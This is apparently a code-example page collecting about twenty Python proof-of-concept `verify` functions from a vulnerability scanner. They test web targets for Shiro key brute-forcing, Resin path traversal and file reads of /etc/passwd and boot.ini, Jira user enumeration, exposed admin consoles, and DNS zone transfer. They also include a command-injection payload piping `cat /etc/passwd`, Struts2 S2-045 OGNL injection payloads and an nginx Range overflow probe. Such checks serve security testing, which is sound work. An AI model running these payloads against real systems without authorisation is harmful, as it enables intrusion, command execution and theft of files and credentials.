Ejemplo n.º 1
def verify(arg, **kwargs):
    """Check *arg* for Apache Shiro with a known ``rememberMe`` cookie key.

    ``test_shiro(arg)`` first decides whether the target looks like Shiro. A
    baseline GET with a throwaway ``rememberMe`` cookie records the length of
    the response headers; then each candidate ``key`` from the module-level
    ``keys`` list is used to turn ``checkdata`` into a cookie value, and a
    header-length change together with a non-400 status is taken as the hit.
    Returns ``{"url", "poc-name", "exploit": key}`` on a hit; ``None`` when the
    target is not Shiro or no candidate key matches. ``kwargs`` is unused.
    Relies on module-level ``requests``, ``base64``, ``PROXY``, ``headers``,
    ``keys``, ``checkdata``, ``CBCCipher``, ``test_shiro``, ``save`` and
    ``pocname``.
    """
    a = test_shiro(arg)
    if a:
        print("[!]Target {} Found Shiro".format(arg))
        # Baseline request: "123" is presumably not a valid ciphertext, so this
        # response shape is the "rejected cookie" reference point.
        # verify=False: TLS certificate errors are ignored for this probe.
        r1 = requests.get(arg,
                          cookies={'rememberMe': "123"},
                          proxies=PROXY,
                          timeout=10,
                          verify=False,
                          headers=headers,
                          allow_redirects=False)
        res1 = len(str(r1.headers))
        for key in keys:
            print("[-] Brute key: {0}".format(key))
            # CBCCipher(key, plaintext) presumably returns bytes; .decode()
            # turns it into the cookie string — TODO confirm its return type.
            payload = CBCCipher(key, base64.b64decode(checkdata))
            payload = payload.decode()
            r2 = requests.get(arg,
                              cookies={'rememberMe': payload},
                              timeout=10,
                              proxies=PROXY,
                              verify=False,
                              headers=headers,
                              allow_redirects=False)
            res2 = len(str(r2.headers))
            # Header-length comparison is a heuristic: any response variation
            # (not only an accepted cookie) changes it, so expect false positives.
            if res1 != res2 and r2.status_code != 400:
                print("[+] Found key!!!: {}".format(key))
                save(arg, pocname, key)
                return {"url": arg, "poc-name": pocname, "exploit": key}
            else:
                pass
        # Loop exhausted without a hit: falls through and returns None.
    else:
        return None
Ejemplo n.º 2
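def verify(arg, **kwargs):
    """Check whether the domain in *arg* allows a DNS zone transfer (AXFR).

    Strips the URL scheme and port from *arg*, resolves the domain's NS
    records and attempts an AXFR against each name server. On the first
    server that returns a zone, records the finding via ``save`` and returns
    ``{"url": domain, "poc-name", "exploit": name_server}``; otherwise returns
    ``None``. Resolver, network and parse errors are treated as "no
    transfer". ``kwargs`` is unused. Relies on module-level ``dns``, ``save``
    and ``pocname``.
    """
    try:
        # Chain both replacements: the original reassigned ``host`` from
        # ``arg`` twice, so the "http://" removal was silently discarded.
        host = arg.replace("http://", "").replace("https://", "")
        domain = host.split(":")[0]
        resolver = dns.resolver.Resolver()
        resolver.timeout = 10
        for name_server in resolver.query(domain, "NS"):
            xfr = dns.query.xfr(str(name_server),
                                domain,
                                timeout=10,
                                lifetime=10)
            if dns.zone.from_xfr(xfr):
                save(domain, pocname, name_server)
                return {
                    "url": domain,
                    "poc-name": pocname,
                    "exploit": name_server
                }
    except Exception:
        # Best-effort probe: NXDOMAIN, refused AXFR, timeouts and zone parse
        # errors all mean "no transfer", so fall through to None.
        pass
    return None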
Ejemplo n.º 3
def verify(arg, **kwargs):
    """Probe *arg* for an unauthenticated Jira user/group picker endpoint.

    Returns ``{"url", "poc-name", "exploit"}`` when the JSON user-list marker
    is present in the response body, ``None`` otherwise. Any request or
    processing error is treated as "not found". ``kwargs`` is unused; relies
    on module-level ``requests``, ``save`` and ``pocname``.
    """
    exploit = "/rest/api/latest/groupuserpicker?query=testuser12345&maxResults=50&showAvatar=false"
    marker = '{"users":{'
    result = None
    try:
        body = requests.get(url=arg + exploit, timeout=5).text
        if marker in body:
            save(arg, pocname, exploit)
            result = {"url": arg, "poc-name": pocname, "exploit": exploit}
    except Exception:
        result = None
    return result
Ejemplo n.º 4
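def verify(arg, **kwargs):
    """Check *arg* for a Resin directory listing of ``web-inf`` via a traversal path.

    Returns ``{"url", "poc-name", "exploit"}`` when the response body carries
    both the listing marker and the server name, ``None`` otherwise. Request
    errors are treated as "not found". ``kwargs`` is unused; relies on
    module-level ``requests``, ``headers``, ``save`` and ``pocname``.
    """
    exploit = "/ ../web-inf/"
    try:
        # timeout added: the original GET could block indefinitely on a
        # non-responding host.
        r = requests.get(url=arg + exploit, headers=headers, timeout=5)
        if "Directory of" in r.text and "resin" in r.text:
            save(arg, pocname, exploit)
            return {"url": arg, "poc-name": pocname, "exploit": exploit}
    except Exception:
        # Best-effort probe: connection/timeout errors mean "not found".
        pass
    return None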
Ejemplo n.º 5
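def verify(arg, **kwargs):
    """Check *arg* for the Resin ``viewfile`` arbitrary file read (Windows ``boot.ini``).

    Returns ``{"url", "poc-name", "exploit"}`` when the response body contains
    both ``disk`` and ``boot`` (boot.ini content), ``None`` otherwise. Request
    errors are treated as "not found". ``kwargs`` is unused; relies on
    module-level ``requests``, ``headers``, ``save`` and ``pocname``.
    """
    # Raw string: the original literal contained ``\&``, an invalid escape
    # that newer Pythons warn about; the value is unchanged.
    exploit = r"/resin-doc/viewfile/?contextpath=C:\&servletpath=&file=boot.ini"
    try:
        # timeout added: the original GET could block indefinitely.
        r = requests.get(url=arg + exploit, headers=headers, timeout=5)
        if "disk" in r.text and "boot" in r.text:
            save(arg, pocname, exploit)
            return {"url": arg, "poc-name": pocname, "exploit": exploit}
    except Exception:
        # Best-effort probe: connection/timeout errors mean "not found".
        pass
    return None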
Ejemplo n.º 6
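def verify(arg, **kwargs):
    """Check *arg* for Resin ``viewfile`` source disclosure of ``index.jsp``.

    Returns ``{"url", "poc-name", "exploit"}`` when the body contains a JSP
    directive marker (``<%@``) and the server name, ``None`` otherwise.
    Request errors are treated as "not found". ``kwargs`` is unused; relies
    on module-level ``requests``, ``headers``, ``save`` and ``pocname``.
    """
    exploit = "/resin-doc/viewfile/?file=index.jsp"
    try:
        # timeout added: the original GET could block indefinitely.
        r = requests.get(url=arg + exploit, headers=headers, timeout=5)
        if "<%@" in r.text and "resin" in r.text:
            save(arg, pocname, exploit)
            return {"url": arg, "poc-name": pocname, "exploit": exploit}
    except Exception:
        # Best-effort probe: connection/timeout errors mean "not found".
        pass
    return None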
Ejemplo n.º 7
def verify(arg, **kwargs):
    """Check whether *arg* exposes Subversion working-copy metadata.

    Requests ``/.svn/all-wcprops`` and treats the ``svn:wc:ra_dav:version-url``
    property name in the body as confirmation. Returns
    ``{"url", "poc-name", "exploit"}`` on a hit and ``None`` otherwise;
    request errors count as "not found". ``kwargs`` is unused; relies on
    module-level ``requests``, ``headers``, ``save`` and ``pocname``.
    """
    exploit = "/.svn/all-wcprops"
    signature = "svn:wc:ra_dav:version-url"
    outcome = None
    try:
        page = requests.get(url=arg + exploit, headers=headers, timeout=5)
        if signature in page.text:
            save(arg, pocname, exploit)
            outcome = {"url": arg, "poc-name": pocname, "exploit": exploit}
    except Exception:
        outcome = None
    return outcome
Ejemplo n.º 8
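def verify(arg, **kwargs):
    """Check *arg* for the Resin ``jndi-appconfig`` example file read (``/etc/passwd``).

    Returns ``{"url", "poc-name", "exploit"}`` when the body looks like a
    passwd file (``root:`` and ``/bin/bash``), ``None`` otherwise. Request
    errors are treated as "not found". ``kwargs`` is unused; relies on
    module-level ``requests``, ``headers``, ``save`` and ``pocname``.
    """
    exploit = "/resin-doc/examples/jndi-appconfig/test?inputFile=/etc/passwd"
    try:
        # timeout added: the original GET could block indefinitely.
        r = requests.get(url=arg + exploit, headers=headers, timeout=5)
        if "root:" in r.text and "/bin/bash" in r.text:
            save(arg, pocname, exploit)
            return {"url": arg, "poc-name": pocname, "exploit": exploit}
    except Exception:
        # Best-effort probe: connection/timeout errors mean "not found".
        pass
    return None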
Ejemplo n.º 9
def verify(arg, **kwargs):
    """Check whether *arg* serves Jira's ``QueryComponent!Default.jspa`` without authentication.

    The hit is the searcher-groups JSON prefix in the response body. Returns
    ``{"url", "poc-name", "exploit"}`` on a hit and ``None`` otherwise;
    request errors count as "not found". ``kwargs`` is unused; relies on
    module-level ``requests``, ``headers``, ``save`` and ``pocname``.
    """
    exploit = "/secure/QueryComponent!Default.jspa"
    marker = '''{"searchers":{"groups":[{"searchers":[{"name"'''
    hit = False
    try:
        reply = requests.get(url=arg + exploit, timeout=5, headers=headers)
        hit = marker in reply.text
        if hit:
            save(arg, pocname, exploit)
    except Exception:
        return None
    if not hit:
        return None
    return {"url": arg, "poc-name": pocname, "exploit": exploit}
Ejemplo n.º 10
def verify(arg, **kwargs):
    """Check whether *arg* serves Jira's ``ViewUserHover.jspa`` user card without authentication.

    A hit is the avatar link for the probe username ``vvoxyxzt`` appearing in
    the response HTML. Returns ``{"url", "poc-name", "exploit"}`` on a hit and
    ``None`` otherwise; request errors count as "not found". ``kwargs`` is
    unused; relies on module-level ``requests``, ``headers``, ``save`` and
    ``pocname``.
    """
    exploit = "/secure/ViewUserHover.jspa?username=vvoxyxzt"
    marker = '''<a id="avatar-image-link" title="vvoxyxzt" href="/secure/ViewProfile.jspa?name=vvoxyxzt">'''
    finding = {"url": arg, "poc-name": pocname, "exploit": exploit}
    try:
        html = requests.get(url=arg + exploit, timeout=5, headers=headers).text
    except Exception:
        return None
    if marker not in html:
        return None
    try:
        save(arg, pocname, exploit)
    except Exception:
        return None
    return finding
Ejemplo n.º 11
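def verify(arg, **kwargs):
    """Check whether *arg* exposes the Druid monitoring console at ``/druid/index.html``.

    Returns ``{"url", "poc-name", "exploit"}`` when the page title marker
    ``Druid Stat Index`` is in the body, ``None`` otherwise. Request errors
    are treated as "not found". ``kwargs`` is unused; relies on module-level
    ``requests``, ``headers``, ``save`` and ``pocname``.
    """
    exploit = "/druid/index.html"
    try:
        # timeout added: the original GET could block indefinitely.
        r = requests.get(url=arg + exploit, headers=headers, timeout=5)
        if "Druid Stat Index" in r.text:
            save(arg, pocname, exploit)
            return {"url": arg, "poc-name": pocname, "exploit": exploit}
    except Exception:
        # Best-effort probe: connection/timeout errors mean "not found".
        pass
    return None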
Ejemplo n.º 12
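def verify(arg, **kwargs):
    """Check whether *arg* exposes the JBoss ``jmx-console`` without authentication.

    Returns ``{"url", "poc-name", "exploit"}`` when the body carries all three
    console markers (``JMImplementation``, ``JMX Agent View``, ``jboss.``),
    ``None`` otherwise. Request errors are treated as "not found". ``kwargs``
    is unused; relies on module-level ``requests``, ``headers``, ``save`` and
    ``pocname``.
    """
    exploit = "/jmx-console/"
    markers = ('JMImplementation', 'JMX Agent View', 'jboss.')
    try:
        # timeout added: the original GET could block indefinitely.
        r = requests.get(url=arg + exploit, headers=headers, timeout=5)
        if all(marker in r.text for marker in markers):
            save(arg, pocname, exploit)
            return {"url": arg, "poc-name": pocname, "exploit": exploit}
    except Exception:
        # Best-effort probe: connection/timeout errors mean "not found".
        pass
    return None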
Ejemplo n.º 13
def verify(arg, **kwargs):
    """Check whether *arg* exposes a Spring Boot Actuator ``/env`` endpoint.

    The hit is the ``spring.datasource`` property prefix in the body. Returns
    ``{"url", "poc-name", "exploit"}`` on a hit and ``None`` otherwise;
    request errors count as "not found". ``kwargs`` is unused; relies on
    module-level ``requests``, ``headers``, ``save`` and ``pocname``.
    """
    exploit = "/env"
    try:
        text = requests.get(url=arg + exploit, headers=headers, timeout=7).text
        matched = "spring.datasource" in text
        if matched:
            save(arg, pocname, exploit)
    except Exception:
        matched = False
    return {"url": arg, "poc-name": pocname, "exploit": exploit} if matched else None
Ejemplo n.º 14
def verify(arg, **kwargs):
	"""Check *arg* for OS command injection in the ``type`` parameter of ``moni_detail.do``.

	POSTs a ``type`` value containing shell metacharacters and treats
	``root:x`` (the start of the root line of ``/etc/passwd``) in the response
	body as confirmation. Returns ``{"url", "poc-name", "exploit"}`` on a hit,
	``None`` otherwise; request errors are treated as "not found". ``kwargs``
	is unused; relies on module-level ``requests``, ``headers``, ``save`` and
	``pocname``.
	"""
	exploit = "/webadm/?q=moni_detail.do&action=gragh"
	# Sent as a raw string body (not a dict), so no form encoding is applied.
	data = "type='|cat /etc/passwd||'"
	try:
		r = requests.post(url=arg+exploit,headers=headers,data=data,timeout=7)
		if "root:x" in r.text:
			save(arg,pocname,exploit)
			return {"url": arg, "poc-name":pocname, "exploit": exploit}
	except Exception as e:
		# Best-effort probe: any error is read as "not found" (returns None).
		pass
Ejemplo n.º 15
def verify(arg, **kwargs):
	"""Check *arg* for Struts2 OGNL evaluation of the ``Content-Type`` header (S2-045 family).

	Sends a GET with the module-level ``headers`` and looks for the product
	``40765*42539`` (``1734102335``) in the ``x-res`` response header.
	Returns ``{"url", "poc-name", "exploit"}`` on a hit, ``None`` otherwise.
	``kwargs`` is unused; relies on module-level ``requests``, ``headers``,
	``save`` and ``pocname``.
	"""
	# Stored in the result as the "exploit" value only; the request below
	# sends the module-level ``headers`` unchanged.
	exploit = "Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-RES',40765*42539)}.multipart/form-data"
	try:
		# allow_redirects=False: the header is checked on the first response.
		r = requests.get(url=arg,headers=headers,allow_redirects=False)
		#print(type(r.headers['x-res']))
		# A missing ``x-res`` header raises KeyError here, which the broad
		# except below turns into "not vulnerable" (returns None).
		if "1734102335" in r.headers['x-res']:
			save(arg,pocname,exploit)
			return {"url": arg, "poc-name":pocname, "exploit": exploit}
	except Exception as e:
		pass
Ejemplo n.º 16
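def verify(arg, **kwargs):
    """Check whether *arg* exposes a JetBrains ``.idea/`` project directory listing.

    Requests ``/.idea/`` and treats a ``Directory: /.idea/`` listing title in
    the body as confirmation. Returns ``{"url", "poc-name", "exploit"}`` on a
    hit and ``None`` otherwise; request errors are treated as "not found".
    ``kwargs`` is unused; relies on module-level ``requests``, ``headers``,
    ``save`` and ``pocname``.
    """
    # Only the directory listing is probed; the original also declared
    # ``/.idea/workspace.xml`` and ``/.idea/modules.xml`` but never
    # requested them, so those unused locals are dropped here.
    exploit = "/.idea/"
    try:
        r = requests.get(url=arg + exploit, headers=headers, timeout=5)
        if "Directory: /.idea/" in r.text:
            save(arg, pocname, exploit)
            return {"url": arg, "poc-name": pocname, "exploit": exploit}
    except Exception:
        # Best-effort probe: connection/timeout errors mean "not found".
        pass
    return None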
Ejemplo n.º 17
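def verify(arg, **kwargs):
    """Check whether the host in *arg* exposes an LDAP service (port 389).

    Strips the URL scheme and port from *arg* and hands the bare host to
    ``check_ldap``. On a positive result the finding is recorded via ``save``
    and ``{"url": host, "poc-name", "exploit": "389"}`` is returned;
    otherwise ``None``. ``kwargs`` is unused; relies on module-level
    ``check_ldap``, ``save`` and ``pocname``.
    """
    # Chain both replacements: the original reassigned ``host`` from ``arg``
    # twice, so an "http://" prefix survived into the hostname and the
    # ``split(":")`` below then yielded the scheme instead of the host.
    host = arg.replace("http://", "").replace("https://", "")
    ip = host.split(":")[0]
    # ``check_ldap`` is deliberately outside the try, as in the original:
    # its errors propagate to the caller.
    if not check_ldap(ip):
        return None
    try:
        save(arg, pocname, "389")
    except Exception:
        # Best-effort: a failure to record the hit yields no result.
        return None
    return {"url": host, "poc-name": pocname, "exploit": "389"}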
Ejemplo n.º 18
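def bak(domain, file):
    """Probe ``domain + file`` for a downloadable backup file and record a hit.

    A hit is a 200 response whose ``Content-Type`` contains ``application``
    (presumably a download rather than an HTML page). On a hit the target URL
    is passed to ``save`` and the result dict is printed; nothing is
    returned. Request errors are swallowed (best-effort probe). Relies on
    module-level ``requests``, ``headers``, ``save`` and ``pocname``.
    """
    target = domain + file
    try:
        # timeout added: the original GET could block indefinitely.
        r = requests.get(url=target, headers=headers, timeout=5)
        # Equivalent to the original "key present and substring" two-step
        # check; a missing header yields "" and therefore no match.
        content_type = r.headers.get("Content-Type", "")
        if r.status_code == 200 and "application" in content_type:
            save(domain, pocname, target)
            print({"url": domain, "poc-name": pocname, "exploit": target})
    except Exception:
        # Best-effort probe: connection/timeout errors mean "not found".
        pass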
Ejemplo n.º 19
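def verify(arg, **kwargs):
    """Check whether *arg* accepts arbitrary HTTP ``PUT`` uploads.

    Uploads a small text marker to ``/2222.txt``, reads it back with GET and,
    when the marker is echoed, records the finding, deletes the probe file and
    returns ``{"url", "poc-name", "exploit"}``; otherwise returns ``None``.
    Request errors are treated as "not found". ``kwargs`` is unused; relies
    on module-level ``requests``, ``headers``, ``save`` and ``pocname``.
    """
    exploit = "/2222.txt"
    data = "This is a test!"
    target = arg + exploit
    try:
        requests.put(url=target, headers=headers, data=data, timeout=7)
        readback = requests.get(url=target, headers=headers, timeout=5)
        # The uploaded marker is the same string we look for on read-back.
        if data in readback.text:
            save(arg, pocname, exploit)
            # Clean up the probe file. The original DELETE carried no timeout
            # and no headers, so a slow host could hang here indefinitely.
            requests.delete(url=target, headers=headers, timeout=7)
            return {"url": arg, "poc-name": pocname, "exploit": exploit}
    except Exception:
        # Best-effort probe: connection/timeout failures mean "not found".
        pass
    return None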
Ejemplo n.º 20
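def verify(arg, **kwargs):
    """Check whether the host in *arg* exposes MongoDB on its default port (27017).

    Strips the URL scheme and port from *arg* and hands the bare host and
    port to ``check_mongodb``. On a positive result the finding is recorded
    via ``save`` and ``{"url": host, "poc-name", "exploit": "27017"}`` is
    returned; otherwise ``None``. ``kwargs`` is unused; relies on
    module-level ``check_mongodb``, ``save`` and ``pocname``.
    """
    port = 27017
    # Chain both replacements: the original reassigned ``host`` from ``arg``
    # twice, so an "http://" prefix survived and ``split(":")`` below then
    # yielded the scheme instead of the hostname.
    host = arg.replace("http://", "").replace("https://", "")
    host = host.split(":")[0]
    # ``check_mongodb`` is deliberately outside the try, as in the original:
    # its errors propagate to the caller.
    if not check_mongodb(host, port):
        return None
    try:
        save(arg, pocname, str(port))
    except Exception:
        # Best-effort: a failure to record the hit yields no result.
        return None
    return {"url": host, "poc-name": pocname, "exploit": str(port)}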
Ejemplo n.º 21
def verify(arg, **kwargs):
    """Check whether *arg* accepts an overlapping, overflowing HTTP ``Range`` request.

    A first GET reads ``Content-Length``; the second sends two negative ranges
    whose magnitudes sum to ``0x8000000000000000`` (a signed 64-bit overflow)
    and treats a ``206 Partial Content`` reply as the hit. This has the shape
    of the nginx range-filter overflow check — presumably, it is not stated
    here. Returns ``{"url", "poc-name", "exploit": pocname}`` on a hit,
    ``None`` otherwise; request errors are treated as "not found".
    ``kwargs`` is unused; relies on module-level ``requests``, ``save`` and
    ``pocname``.
    """
    try:
        # NOTE(review): no timeout on this first request, unlike the second.
        a = requests.get(url=arg)
        start = int(a.headers['Content-Length']) + 300
        end = 0x8000000000000000 - start
        # Local ``headers`` shadows any module-level ``headers``.
        headers = {"Range": "bytes=-{},-{}".format(start, end)}
        res = requests.get(url=arg, headers=headers, stream=True, timeout=10)
        # Pull the first 500 bytes of the streamed body; the value is unused
        # and only the status code decides the result.
        ret = res.raw.read(500)
        code = res.status_code
        if code == 206:
            save(arg, pocname, pocname)
            return {"url": arg, "poc-name": pocname, "exploit": pocname}
    except Exception as e:
        # Best-effort probe: any error is read as "not found" (returns None).
        pass
Ejemplo n.º 22
def verify(arg, **kwargs):
    """Check *arg* for Struts2 OGNL evaluation via a multipart upload filename (S2-045 family).

    Builds a single-part multipart body whose ``filename`` carries the OGNL
    expression ``40765*42539``; the hit is the product ``1734102335`` showing
    up in the ``x-res`` response header. Returns
    ``{"url", "poc-name", "exploit"}`` on a hit and ``None`` otherwise;
    request errors and a missing ``x-res`` header (KeyError) are both
    swallowed and read as "not vulnerable". ``kwargs`` is unused; relies on
    module-level ``requests``, ``save`` and ``pocname``.
    """
    # Label stored in the result only; it is not sent anywhere.
    exploit = "upload type,the same as st2-045"

    boundary = "---------------------------735323031399963166993862150"
    # (sic: "paylaod") ends in "\x00b"; the filename below appends another
    # "\0b", so the filename carries two NUL-separated fragments.
    paylaod = "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-RES',40765*42539)}\x00b"
    # Local ``headers`` shadows any module-level ``headers``.
    headers = {
        'Content-Type': 'multipart/form-data; boundary=' + boundary + ''
    }
    data = "--" + boundary + "\r\nContent-Disposition: form-data; name=\"foo\"; filename=\"" + paylaod + "\0b\"\r\nContent-Type: text/plain\r\n\r\nx\r\n--" + boundary + "--"

    try:
        # NOTE(review): no timeout on this POST; a slow host can block here.
        r = requests.post(url=arg, headers=headers, data=data)
        if "1734102335" in r.headers['x-res']:
            save(arg, pocname, exploit)
            return {"url": arg, "poc-name": pocname, "exploit": exploit}
    except Exception as e:
        pass